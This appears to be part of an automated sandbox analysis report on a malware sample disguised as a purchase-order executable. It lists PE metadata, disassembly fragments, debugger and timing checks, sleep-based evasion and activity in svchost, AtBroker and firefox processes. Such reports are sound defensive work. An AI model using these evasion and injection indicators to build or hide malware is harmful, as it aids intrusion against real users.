                Source: Binary string: svchost.pdbUGP source: AtBroker.exe, 00000003.00000002.3526286582.0000000004BAC000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3524603774.000000000083A000.00000004.00000020.00020000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000000.1850115627.00000000032DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2119258740.000000000D29C000.00000004.80000000.00040000.00000000.sdmp
                Source: PO AT-5228.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: PO AT-5228.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: PO AT-5228.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: PO AT-5228.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: PO AT-5228.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\PO AT-5228.exe Code function: 0_2_00B7E01E LoadLibraryA,GetProcAddress, 0_2_00B7E01E
                Source: C:\Users\user\Desktop\PO AT-5228.exe Code function: 0_2_00B8C09E push esi; ret 0_2_00B8C0A0
                Source: C:\Users\user\Desktop\PO AT-5228.exe Code function: 0_2_00B8C187 push edi; ret 0_2_00B8C189
                Source: C:\Users\user\Desktop\PO AT-5228.exe Code function: 0_2_00BCC8BC push esi; ret 0_2_00BCC8BE
                Source: C:\Users\user\Desktop\PO AT-5228.exe Code function: 0_2_00B86B05 push ecx; ret 0_2_00B86B18
                Source: C:\Users\user\Desktop\PO AT-5228.exe Code function: 0_2_00BCED2A push ss; retn 0000h 0_2_00BCED2B
                Source: C:\Users\user\Desktop\PO AT-5228.exe Code function: 0_2_00BAB2B1 push FFFFFF8Bh; iretd 0_2_00BAB2B3
                Source: C:\Users\user\Desktop\PO AT-5228.exe Code function: 0_2_00B8BDAA push edi; ret 0_2_00B8BDAC
                Source: C:\Users\user\Desktop\PO AT-5228.exe Code function: 0_2_00B8BEC3 push esi; ret 0_2_00B8BEC5
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00441AAD push 5BDF9A96h; iretd 1_2_00441ACA
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00442099 push esp; ret 1_2_0044209A
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00443390 push eax; ret 1_2_00443392
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00444C75 push cs; iretd 1_2_00444C8B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0044847B push cs; retf 1_2_0044847E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00444D15 pushad ; ret 1_2_00444D16
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0046D533 pushfd ; retf 1_2_0046D552
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00444DBA push 6B6FB766h; ret 1_2_00444DBF
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0045277B push edi; iretd 1_2_0045278D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E0225F pushad ; ret 1_2_02E027F9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E027FA pushad ; ret 1_2_02E027F9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E0283D push eax; iretd 1_2_02E02858
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E309AD push ecx; mov dword ptr [esp], ecx 1_2_02E309B6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E01368 push eax; iretd 1_2_02E01369
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe Code function: 2_2_052B3DD0 push edi; iretd 2_2_052B3DE2
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe Code function: 2_2_052A640F push 6B6FB766h; ret 2_2_052A6414
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe Code function: 2_2_052C01F6 push ebx; ret 2_2_052C01FC
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe Code function: 2_2_052A636A pushad ; ret 2_2_052A636B
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe Code function: 2_2_052BAB64 push eax; retf 2_2_052BABDA
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe Code function: 2_2_052A62CA push cs; iretd 2_2_052A62E0
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe Code function: 2_2_052A9AD0 push cs; retf 2_2_052A9AD3
                Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 3_2_045827FA pushad ; ret 3_2_045827F9
                Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 3_2_0458225F pushad ; ret 3_2_045827F9
                Source: C:\Users\user\Desktop\PO AT-5228.exe Code function: 0_2_00BC8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00BC8111
                Source: C:\Users\user\Desktop\PO AT-5228.exe Code function: 0_2_00B7EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00B7EB42
                Source: C:\Users\user\Desktop\PO AT-5228.exe Code function: 0_2_00B8123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00B8123A
                Source: C:\Users\user\Desktop\PO AT-5228.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\AtBroker.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\AtBroker.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\AtBroker.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\AtBroker.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\AtBroker.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\PO AT-5228.exe API/Special instruction interceptor: Address: 19608C4
                Source: C:\Windows\SysWOW64\AtBroker.exe API/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\AtBroker.exe API/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\AtBroker.exe API/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\AtBroker.exe API/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\AtBroker.exe API/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\AtBroker.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\AtBroker.exe API/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\AtBroker.exe API/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E7096E rdtsc 1_2_02E7096E
                Source: C:\Users\user\Desktop\PO AT-5228.exe Evaded block: after key decision graph_0-94478
                Source: C:\Users\user\Desktop\PO AT-5228.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-96237
                Source: C:\Users\user\Desktop\PO AT-5228.exe API coverage: 4.8 %
                Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\AtBroker.exe API coverage: 2.6 %
                Source: C:\Windows\SysWOW64\AtBroker.exe TID: 7424 Thread sleep count: 49 > 30
                Source: C:\Windows\SysWOW64\AtBroker.exe TID: 7424 Thread sleep time: -98000s >= -30000s
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe TID: 7564 Thread sleep time: -70000s >= -30000s
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe TID: 7564 Thread sleep time: -43500s >= -30000s
                Source: C:\Windows\SysWOW64\AtBroker.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\AtBroker.exe Last function: Thread delayed
                Source: C:\Users\user\Desktop\PO AT-5228.exe Code function: 0_2_00BA6CA9 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00BA6CA9
                Source: C:\Users\user\Desktop\PO AT-5228.exe Code function: 0_2_00BA60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 0_2_00BA60DD
                Source: C:\Users\user\Desktop\PO AT-5228.exe Code function: 0_2_00BA63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 0_2_00BA63F9
                Source: C:\Users\user\Desktop\PO AT-5228.exe Code function: 0_2_00BAEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00BAEB60
                Source: C:\Users\user\Desktop\PO AT-5228.exe Code function: 0_2_00BAF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00BAF5FA
                Source: C:\Users\user\Desktop\PO AT-5228.exe Code function: 0_2_00BAF56F FindFirstFileW,FindClose, 0_2_00BAF56F
                Source: C:\Users\user\Desktop\PO AT-5228.exe Code function: 0_2_00BB1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00BB1B2F
                Source: C:\Users\user\Desktop\PO AT-5228.exe Code function: 0_2_00BB1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00BB1C8A
                Source: C:\Users\user\Desktop\PO AT-5228.exe Code function: 0_2_00BB1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00BB1F94
                Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 3_2_004FC830 FindFirstFileW,FindNextFileW,FindClose, 3_2_004FC830
                Source: C:\Users\user\Desktop\PO AT-5228.exe Code function: 0_2_00B7DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00B7DDC0
                Source: BLUymyzgBTyhbo.exe, 00000005.00000002.3525186169.00000000013AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
                Source: firefox.exe, 00000008.00000002.2120522294.0000021D4D29C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
                Source: AtBroker.exe, 00000003.00000002.3524603774.000000000083A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\PO AT-5228.exe API call chain: ExitProcess graph end node graph_0-94765
                Source: C:\Users\user\Desktop\PO AT-5228.exe API call chain: ExitProcess graph end node graph_0-93644
                Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\AtBroker.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E7096E rdtsc 1_2_02E7096E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00457B23 LdrLoadDll, 1_2_00457B23
                Source: C:\Users\user\Desktop\PO AT-5228.exe Code function: 0_2_00BB6AAF BlockInput, 0_2_00BB6AAF
                Source: C:\Users\user\Desktop\PO AT-5228.exe Code function: 0_2_00B63D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00B63D19
                Source: C:\Users\user\Desktop\PO AT-5228.exe Code function: 0_2_00B93920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW, 0_2_00B93920
                Source: C:\Users\user\Desktop\PO AT-5228.exe Code function: 0_2_00B7E01E LoadLibraryA,GetProcAddress, 0_2_00B7E01E
                Source: C:\Users\user\Desktop\PO AT-5228.exe Code function: 0_2_0195F530 mov eax, dword ptr fs:[00000030h] 0_2_0195F530
                Source: C:\Users\user\Desktop\PO AT-5228.exe Code function: 0_2_01960B90 mov eax, dword ptr fs:[00000030h] 0_2_01960B90
                Source: C:\Users\user\Desktop\PO AT-5228.exe Code function: 0_2_01960B30 mov eax, dword ptr fs:[00000030h] 0_2_01960B30
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E402E1 mov eax, dword ptr fs:[00000030h] 1_2_02E402E1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E402E1 mov eax, dword ptr fs:[00000030h] 1_2_02E402E1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E402E1 mov eax, dword ptr fs:[00000030h] 1_2_02E402E1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E3A2C3 mov eax, dword ptr fs:[00000030h] 1_2_02E3A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E3A2C3 mov eax, dword ptr fs:[00000030h] 1_2_02E3A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E3A2C3 mov eax, dword ptr fs:[00000030h] 1_2_02E3A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E3A2C3 mov eax, dword ptr fs:[00000030h] 1_2_02E3A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E3A2C3 mov eax, dword ptr fs:[00000030h] 1_2_02E3A2C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F062D6 mov eax, dword ptr fs:[00000030h] 1_2_02F062D6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E402A0 mov eax, dword ptr fs:[00000030h] 1_2_02E402A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E402A0 mov eax, dword ptr fs:[00000030h] 1_2_02E402A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EC62A0 mov eax, dword ptr fs:[00000030h] 1_2_02EC62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EC62A0 mov ecx, dword ptr fs:[00000030h] 1_2_02EC62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EC62A0 mov eax, dword ptr fs:[00000030h] 1_2_02EC62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EC62A0 mov eax, dword ptr fs:[00000030h] 1_2_02EC62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EC62A0 mov eax, dword ptr fs:[00000030h] 1_2_02EC62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EC62A0 mov eax, dword ptr fs:[00000030h] 1_2_02EC62A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E6E284 mov eax, dword ptr fs:[00000030h] 1_2_02E6E284
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E6E284 mov eax, dword ptr fs:[00000030h] 1_2_02E6E284
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EB0283 mov eax, dword ptr fs:[00000030h] 1_2_02EB0283
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EB0283 mov eax, dword ptr fs:[00000030h] 1_2_02EB0283
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EB0283 mov eax, dword ptr fs:[00000030h] 1_2_02EB0283
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E34260 mov eax, dword ptr fs:[00000030h] 1_2_02E34260
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E34260 mov eax, dword ptr fs:[00000030h] 1_2_02E34260
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E34260 mov eax, dword ptr fs:[00000030h] 1_2_02E34260
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E2826B mov eax, dword ptr fs:[00000030h] 1_2_02E2826B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EE0274 mov eax, dword ptr fs:[00000030h] 1_2_02EE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EE0274 mov eax, dword ptr fs:[00000030h] 1_2_02EE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EE0274 mov eax, dword ptr fs:[00000030h] 1_2_02EE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EE0274 mov eax, dword ptr fs:[00000030h] 1_2_02EE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EE0274 mov eax, dword ptr fs:[00000030h] 1_2_02EE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EE0274 mov eax, dword ptr fs:[00000030h] 1_2_02EE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EE0274 mov eax, dword ptr fs:[00000030h] 1_2_02EE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EE0274 mov eax, dword ptr fs:[00000030h] 1_2_02EE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EE0274 mov eax, dword ptr fs:[00000030h] 1_2_02EE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EE0274 mov eax, dword ptr fs:[00000030h] 1_2_02EE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EE0274 mov eax, dword ptr fs:[00000030h] 1_2_02EE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EE0274 mov eax, dword ptr fs:[00000030h] 1_2_02EE0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EB8243 mov eax, dword ptr fs:[00000030h] 1_2_02EB8243
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EB8243 mov ecx, dword ptr fs:[00000030h] 1_2_02EB8243
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F0625D mov eax, dword ptr fs:[00000030h] 1_2_02F0625D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E2A250 mov eax, dword ptr fs:[00000030h] 1_2_02E2A250
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E36259 mov eax, dword ptr fs:[00000030h] 1_2_02E36259
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EEA250 mov eax, dword ptr fs:[00000030h] 1_2_02EEA250
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EEA250 mov eax, dword ptr fs:[00000030h] 1_2_02EEA250
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E2823B mov eax, dword ptr fs:[00000030h] 1_2_02E2823B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E403E9 mov eax, dword ptr fs:[00000030h] 1_2_02E403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E403E9 mov eax, dword ptr fs:[00000030h] 1_2_02E403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E403E9 mov eax, dword ptr fs:[00000030h] 1_2_02E403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E403E9 mov eax, dword ptr fs:[00000030h] 1_2_02E403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E403E9 mov eax, dword ptr fs:[00000030h] 1_2_02E403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E403E9 mov eax, dword ptr fs:[00000030h] 1_2_02E403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E403E9 mov eax, dword ptr fs:[00000030h] 1_2_02E403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E403E9 mov eax, dword ptr fs:[00000030h] 1_2_02E403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E4E3F0 mov eax, dword ptr fs:[00000030h] 1_2_02E4E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E4E3F0 mov eax, dword ptr fs:[00000030h] 1_2_02E4E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E4E3F0 mov eax, dword ptr fs:[00000030h] 1_2_02E4E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E663FF mov eax, dword ptr fs:[00000030h] 1_2_02E663FF
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EEC3CD mov eax, dword ptr fs:[00000030h] 1_2_02EEC3CD
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E3A3C0 mov eax, dword ptr fs:[00000030h] 1_2_02E3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E3A3C0 mov eax, dword ptr fs:[00000030h] 1_2_02E3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E3A3C0 mov eax, dword ptr fs:[00000030h] 1_2_02E3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E3A3C0 mov eax, dword ptr fs:[00000030h] 1_2_02E3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E3A3C0 mov eax, dword ptr fs:[00000030h] 1_2_02E3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E3A3C0 mov eax, dword ptr fs:[00000030h] 1_2_02E3A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E383C0 mov eax, dword ptr fs:[00000030h] 1_2_02E383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E383C0 mov eax, dword ptr fs:[00000030h] 1_2_02E383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E383C0 mov eax, dword ptr fs:[00000030h] 1_2_02E383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E383C0 mov eax, dword ptr fs:[00000030h] 1_2_02E383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EB63C0 mov eax, dword ptr fs:[00000030h] 1_2_02EB63C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EDE3DB mov eax, dword ptr fs:[00000030h] 1_2_02EDE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EDE3DB mov eax, dword ptr fs:[00000030h] 1_2_02EDE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EDE3DB mov ecx, dword ptr fs:[00000030h] 1_2_02EDE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EDE3DB mov eax, dword ptr fs:[00000030h] 1_2_02EDE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02ED43D4 mov eax, dword ptr fs:[00000030h] 1_2_02ED43D4
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02ED43D4 mov eax, dword ptr fs:[00000030h] 1_2_02ED43D4
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E2E388 mov eax, dword ptr fs:[00000030h] 1_2_02E2E388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E2E388 mov eax, dword ptr fs:[00000030h] 1_2_02E2E388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E2E388 mov eax, dword ptr fs:[00000030h] 1_2_02E2E388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E5438F mov eax, dword ptr fs:[00000030h] 1_2_02E5438F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E5438F mov eax, dword ptr fs:[00000030h] 1_2_02E5438F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E28397 mov eax, dword ptr fs:[00000030h] 1_2_02E28397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E28397 mov eax, dword ptr fs:[00000030h] 1_2_02E28397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02E28397 mov eax, dword ptr fs:[00000030h] 1_2_02E28397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02ED437C mov eax, dword ptr fs:[00000030h] 1_2_02ED437C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h] 1_2_02EB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h] 1_2_02EB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h] 1_2_02EB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h] 1_2_02EB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h] 1_2_02EB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h] 1_2_02EB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h] 1_2_02EB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h] 1_2_02EB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h] 1_2_02EB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h] 1_2_02EB2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h] 1_2_02EB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h]1_2_02EB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h]1_2_02EB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h]1_2_02EB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB2349 mov eax, dword ptr fs:[00000030h]1_2_02EB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB035C mov eax, dword ptr fs:[00000030h]1_2_02EB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB035C mov eax, dword ptr fs:[00000030h]1_2_02EB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB035C mov eax, dword ptr fs:[00000030h]1_2_02EB035C
